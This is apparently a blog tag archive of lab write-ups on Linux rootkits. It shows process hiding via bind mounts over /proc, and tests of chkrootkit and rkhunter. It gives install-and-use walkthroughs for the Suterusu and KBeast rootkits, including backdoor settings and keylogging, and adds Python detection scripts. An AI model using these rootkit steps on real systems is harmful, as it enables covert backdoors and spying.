Tag archive: rootkit

Hiding ports and processes with mount --bind

[root@server120 init]# nc -vv -l -p 2345 &
[root@server120 init]# ps axu | grep 3533 | grep -v grep
root 3533 0.0 0.0 103020 792 pts/1 S 13:46 0:00 nc -vv -l -p 2345
[root@server120 tmp]# netstat -antlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 3533/nc 
[root@server120 tmp]# lsof -i:2345
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
nc 3533 root 3u IPv4 1753126 0t0 TCP *:dbm (LISTEN)

Create an empty directory and bind-mount it over the process's /proc entry:

[root@server120 tmp]# mkdir /tmp/empty
[root@server120 tmp]# mount --bind /tmp/empty/ /proc/3533
mount: block device /tmp/empty is write-protected, mounting read-only
mount: cannot mount block device /tmp/empty read-only

The mount fails. On reflection, this is because SELinux had been switched on a few days earlier while testing sudo privilege escalation:

[root@server120 tmp]# getenforce 
Enforcing
[root@server120 tmp]# setenforce 0
[root@server120 tmp]# mount --bind /tmp/empty/ /proc/3533

Looking again: ps no longer shows the process, and netstat no longer shows which process owns the port.

[root@server120 tmp]# ps axu | grep 3533 | grep -v grep
[root@server120 tmp]# netstat -antlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN - 
[root@server120 tmp]# lsof -i:2345
[root@server120 tmp]#

The size of the /proc entry has become 4096:

[root@server120 tmp]# ls -ld /proc/3533
drwxr-xr-x. 2 root root 4096 7月 21 14:02 /proc/3533

Fix:

[root@server120 tmp]# umount /proc/3533

Checking the mount tables:
1) /proc/mounts

[root@server120 tmp]# cat /proc/mounts | grep 3533
/dev/mapper/vg_template1-lv_root /proc/3533 ext4 rw,seclabel,relatime,barrier=1,data=ordered 0 0

2) /proc/$$/mountinfo

[root@server120 tmp]# cat /proc/$$/mountinfo | grep 3533
29 16 253:0 /tmp/empty /proc/3533 rw,relatime - ext4 /dev/mapper/vg_template1-lv_root rw,seclabel,barrier=1,data=ordered

3) mount -l

[root@server120 tmp]# mount -l | grep 3533
/tmp/empty on /proc/3533 type none (rw,bind)

Because mount -l reads /etc/mtab, where the entry can simply be deleted, methods 1) and 2) are more reliable.
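The kernel's own mount tables are the reliable place to look for this overlay. The Python below is an added example, not from the original post: it parses /proc/self/mountinfo text for mounts sitting on /proc/<pid>, compares the mount points in /proc/mounts with those in /etc/mtab to catch an edited mtab, and checks live /proc/<pid> entries for the non-zero size and missing status file seen above. The sample mountinfo lines are constructed from the post's output.

```python
import os
import re

# Constructed sample in /proc/self/mountinfo format; the second line mirrors the
# overlay created in the post (/tmp/empty bind-mounted over /proc/3533).
SAMPLE_MOUNTINFO = """\
16 1 0:3 / /proc rw,relatime - proc proc rw
29 16 253:0 /tmp/empty /proc/3533 rw,relatime - ext4 /dev/mapper/vg_template1-lv_root rw,seclabel,barrier=1,data=ordered
"""
PROC_PID = re.compile(r"^/proc/\d+(/|$)")

def parse_mountinfo(text):
    """Yield (mount_point, source_root, fstype, device) per mountinfo line. Fields
    4 and 5 hold the source root and mount point; type and device follow the "-"
    separator, whose position varies because optional fields precede it."""
    for fields in (line.split() for line in text.splitlines()):
        if "-" in fields and len(fields) > fields.index("-") + 2:
            sep = fields.index("-")
            yield fields[4], fields[3], fields[sep + 1], fields[sep + 2]

def proc_overlays(text):
    """Mounts whose mount point is /proc/<pid> or below: each hides a process."""
    return [m for m in parse_mountinfo(text) if PROC_PID.match(m[0])]

def mount_points(text):
    """Mount points (field 2) from /proc/mounts or /etc/mtab text."""
    return {f[1] for f in map(str.split, text.splitlines()) if len(f) > 1}

def mtab_mismatch(proc_mounts_text, mtab_text):
    """Mount points the two tables disagree on: a sign that /etc/mtab was edited."""
    return sorted(mount_points(proc_mounts_text) ^ mount_points(mtab_text))

def suspicious_proc_dirs(proc="/proc"):
    """Live check: a genuine /proc/<pid> has size 0 and a status file; the
    overlaid directory in the post reports 4096 and has no status."""
    bad = []
    for path in (os.path.join(proc, n) for n in os.listdir(proc) if n.isdigit()):
        try:
            size = os.stat(path).st_size
        except FileNotFoundError:
            continue  # process exited during the scan
        if size != 0 or not os.path.exists(os.path.join(path, "status")):
            bad.append(path)
    return bad

if __name__ == "__main__":
    with open("/proc/self/mountinfo") as fh:
        print("overlays:", proc_overlays(fh.read()))
    print("suspicious /proc dirs:", suspicious_proc_dirs())
```

On distributions where /etc/mtab is a symlink to /proc/self/mounts, mtab_mismatch() is always empty; it is only meaningful where /etc/mtab is a real file, as on the el6 hosts in these posts.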

Reference:
http://www.freebuf.com/articles/network/140535.html

Installing and testing rkhunter and chkrootkit (against a KBeast rootkit)

chkrootkit

1. Prepare the gcc build environment
On CentOS, run:
yum -y install gcc gcc-c++ make glibc*
2. Download the chkrootkit source
The official chkrootkit site is http://www.chkrootkit.org; the download URL below is the official one. For safety, always download the program from the official source:
[root@www ~]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
3. Unpack the downloaded archive
[root@www ~]# tar zxf chkrootkit.tar.gz
4. Build (the "*" in the commands below is a shell wildcard; copy and run it as is, without replacing it)
[root@www ~]# cd chkrootkit-*
[root@www ~]# make sense
Note that the build command really is make sense.
5. Deploy the built files to /usr/local/ and remove the leftovers
[root@www ~]# cd ..
[root@www ~]# cp -r chkrootkit-* /usr/local/chkrootkit
[root@www ~]# rm -r chkrootkit-*
Installation is complete.
Usage
The installed chkrootkit program is at /usr/local/chkrootkit/chkrootkit
Run it directly:
root@vm:~# /usr/local/chkrootkit/chkrootkit
Tested on a system with KBeast installed, chkrootkit did not detect it; it performed worse than rkhunter.

rkhunter

http://sourceforge.net/projects/rkhunter/files/
1) Installation
tar -xvf rkhunter-1.4.0.tar.gz
cd rkhunter-1.4.0
./installer.sh --install
Tested on a system with KBeast installed, rkhunter detects it successfully.
/usr/local/bin/rkhunter --check -sk
[19:50:27] Rootkit checks…
[19:50:27] Rootkits checked : 389
[19:50:27] Possible rootkits: 1
[19:50:27] Rootkit names : KBeast Rootkit
2) Updating rkhunter online
rkhunter detects rootkits using a database of known rootkit names, so keeping that database current is important. Update it with:
Run:
rkhunter --update
3) Checking for the latest version
Keep rkhunter itself on the latest version:
Run:
rkhunter --versioncheck

Installing and using the kernel-level rootkit Suterusu

Download: https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
Feature list:

Get root
$ ./sock 0
Hide PID
$ ./sock 1 [pid]
Unhide PID
$ ./sock 2 [pid]
Hide TCPv4 port
$ ./sock 3 [port]
Unhide TCPv4 port
$ ./sock 4 [port]
Hide TCPv6 port
$ ./sock 5 [port]
Unhide TCPv6 port
$ ./sock 6 [port]
Hide UDPv4 port
$ ./sock 7 [port]
Unhide UDPv4 port
$ ./sock 8 [port]
Hide UDPv6 port
$ ./sock 9 [port]
Unhide UDPv6 port
$ ./sock 10 [port]
Hide file/directory
$ ./sock 11 [name]
Unhide file/directory
$ ./sock 12 [name]

Tested on 64-bit CentOS 6.5:
1)

[root@vincent suterusu-master]# make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build  # note the target is linux-x86_64
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ " -C /lib/modules/2.6.32-642.1.1.el6.x86_64/build M=/tmp/suterusu-master modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'
CC [M] /tmp/suterusu-master/main.o
CC [M] /tmp/suterusu-master/util.o
CC [M] /tmp/suterusu-master/module.o
LD [M] /tmp/suterusu-master/suterusu.o
Building modules, stage 2.
MODPOST 1 modules
CC /tmp/suterusu-master/suterusu.mod.o
LD [M] /tmp/suterusu-master/suterusu.ko.unsigned
NO SIGN [M] /tmp/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'

2)

[root@vincent suterusu-master]# gcc sock.c -o sock
sock.c: 在函数‘main’中:
sock.c:205: 警告:隐式声明与内建函数‘strlen’不兼容
sock.c:220: 警告:隐式声明与内建函数‘strlen’不兼容

3)

[root@vincent suterusu-master]# insmod suterusu.ko

Hiding a process:

[root@vincent suterusu-master]# ./sock 1 5542
Hiding PID 5542

Hiding a file:
Note that file hiding matches on the file name only: if you hide a file named x, every x in every directory is hidden.

[root@vincent suterusu-master]# ./sock 11 ../image.php
Hiding file/dir ../image.php

Hiding a connection:

[root@vincent suterusu-master]# netstat -ano | grep 49745
tcp 0 0 0.0.0.0:49745 0.0.0.0:* LISTEN off (0.00/0/0)
[root@vincent suterusu-master]# ./sock 3 49745
Hiding TCPv4 port 49745
[root@vincent suterusu-master]# netstat -ano | grep 49745
[root@vincent suterusu-master]#

Installing and using the kernel-level rootkit KBeast

Download:

http://core.ipsecs.com/rootkit/kernel-rootkit/kbeast-v1/

Features:

> Hiding this loadable kernel module
> Hiding files/directory
> Hiding process (ps, pstree, top, lsof)
> Hiding socket and connections (netstat, lsof)
> Keystroke logging to capture user activity
> Anti-kill process
> Anti-remove files
> Anti-delete this loadable kernel modules
> Local root escalation backdoor
> Remote binding backdoor hidden by the kernel rootkit

The setup script supports kernel versions 2.6.16, 2.6.18, 2.6.32, and 2.6.35.
Installation steps:

> wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
> tar zxvf ipsecs-kbeast-v1.tar.gz
> cd kbeast-v1/
> modify config.h to meet your requirement, remember that _MAGIC_NAME_
must be user with sh/bash shell
> In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
> In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build
(actually it should work for the recent kernel)
> In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat()
related code, modify syscall table address manually, then execute ./setup build 0

Note that it stops working after a reboot, so it has to be added to the boot-time startup.

Tested on CentOS 5.5
Test machine kernel:
yum install kernel kernel-devel gcc
1) Installation

Note:
In the config file config.h, #define _MAGIC_NAME_ "vincent" must name an account whose shell is /bin/bash.

#define _H4X_PATH_ "/usr/_h4x_"   /* install path */
#define _LOGFILE_ "acctlog"       /* keystroke log file */
#define _HIDE_PORT_ 13377         /* backdoor port */
#define _RPASSWORD_ "h4x3d"       /* backdoor password */

2) Connecting to the backdoor
An nmap scan shows port 13377 open:

[root@vincent ~]# nmap -p- 172.16.100.153

Starting Nmap 5.51 ( http://nmap.org ) at 2016-05-31 18:48 CST
Nmap scan report for 172.16.100.153
Host is up (0.000041s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
791/tcp open unknown
13377/tcp open unknown

Connect to the backdoor directly with telnet.

3) Connection hiding
netstat shows nothing; the connection is hidden:

[root@localhost usr]# netstat -ano | grep 13377
[root@localhost usr]#

4) File hiding
/usr/_h4x_ is hidden: ll does not list it, but you can still cd into the directory.

[root@localhost usr]# ll /usr/
总计 216
drwxr-xr-x 2 root root 49152 03-23 01:24 bin
drwxr-xr-x 2 root root 4096 2010-01-27 etc
drwxr-xr-x 2 root root 4096 2010-01-27 games
drwxr-xr-x 37 root root 4096 03-23 00:40 include
drwxr-xr-x 6 root root 4096 03-22 23:13 kerberos
drwxr-xr-x 67 root root 20480 03-23 01:24 lib
drwxr-xr-x 94 root root 40960 03-23 01:24 lib64
drwxr-xr-x 10 root root 4096 03-23 01:24 libexec
drwxr-xr-x 12 root root 4096 03-22 23:12 local
drwxr-xr-x 2 root root 16384 03-23 01:24 sbin
drwxr-xr-x 197 root root 4096 03-22 23:31 share
drwxr-xr-x 4 root root 4096 03-22 23:12 src
lrwxrwxrwx 1 root root 10 03-22 23:12 tmp -> ../var/tmp
drwxr-xr-x 3 root root 4096 03-22 23:12 X11R6
[root@localhost usr]# cd /usr/_h4x_
[root@localhost _h4x_]# ls
acctlog.0 config.h ipsecs-kbeast-v1.cc1 ipsecs-kbeast-v1.mod.o Makefile README.TXT
acctlog.500 init ipsecs-kbeast-v1.ko ipsecs-kbeast-v1.o Module.markers setup
bd-ipsecs-kbeast-v1.c ipsecs-kbeast-v1.c ipsecs-kbeast-v1.mod.c LICENSE Module.symvers

5) Keystroke logging

[root@localhost _h4x_]# cat acctlog.0
[30/03/2016-14:20:06] - [UID = 0 ] bash > ps aux
[30/03/2016-14:20:33] - [UID = 0 ] bash > [UP] | grep h4x
[30/03/2016-14:21:02] - [UID = 0 ] bash > ps xua | grep 3617
[30/03/2016-14:21:11] - [UID = 0 ] bash > ps -ef

6) Process hiding
Running ps directly does not show the process, but piping ps through grep does.

[root@localhost _h4x_]# ps xua | grep h4x
vincent 3617 0.0 0.1 66108 1584 ? Ss 15:20 0:00 ./_h4x_bd

Redirecting ps aux to a file also reveals it.

[root@localhost _h4x_]# ps xua > /tmp/ps.txt
[root@localhost _h4x_]# cat /tmp/ps.txt | grep h4x
vincent 3617 0.0 0.1 66108 1584 ? Ss 15:20 0:00 ./_h4x_bd
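Both Suterusu (sock 1 / sock 3 above) and KBeast hide processes and sockets from ps and netstat, yet the kernel still answers direct probes for them. The Python below is an added example, not code from either project or from the original posts: it brute-forces PIDs with kill(pid, 0) and TCP ports with bind(), and reports whatever is alive but absent from the /proc listing and socket table. A rootkit that also hooks kill() or bind() defeats these probes, so an empty result is necessary, not sufficient; run it as root so ports below 1024 can be probed.

```python
import errno
import os
import socket

def listed_pids():
    """PIDs present in the /proc directory listing, which is all that ps reads."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}

def pid_alive(pid):
    """Probe with signal 0: ESRCH means no such process, EPERM proves it exists."""
    try:
        os.kill(pid, 0)
        return True
    except OSError as e:
        return e.errno == errno.EPERM

def find_hidden_pids(visible, alive, pid_max):
    """PIDs that answer the probe but are missing from the listing."""
    return sorted(p for p in range(1, pid_max + 1) if p not in visible and alive(p))

def parse_tcp_table(lines):
    """Local ports in any state from /proc/net/tcp or tcp6 text (header skipped);
    every state counts, because bind() also refuses ports held by non-listeners."""
    return {int(f[1].rsplit(":", 1)[1], 16) for f in map(str.split, lines)
            if len(f) > 3 and f[0] != "sl"}

def listed_tcp_ports():
    ports = set()
    for path in ("/proc/net/tcp", "/proc/net/tcp6"):
        with open(path) as fh:
            ports |= parse_tcp_table(fh)
    return ports

def port_in_use(port):
    """bind() failing with EADDRINUSE means a socket already owns the port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        try:
            s.bind(("0.0.0.0", port))
        except OSError as e:
            return e.errno == errno.EADDRINUSE
    return False

def find_hidden_ports(visible, in_use, ports=range(1, 65536)):
    """Ports that refuse bind() yet are absent from the kernel's socket table."""
    return sorted(p for p in ports if p not in visible and in_use(p))

if __name__ == "__main__":  # live scan of this host; root needed for ports < 1024
    pid_max = int(open("/proc/sys/kernel/pid_max").read())
    print("hidden pids:", find_hidden_pids(listed_pids(), pid_alive, pid_max))
    print("hidden ports:", find_hidden_ports(listed_tcp_ports(), port_in_use))
```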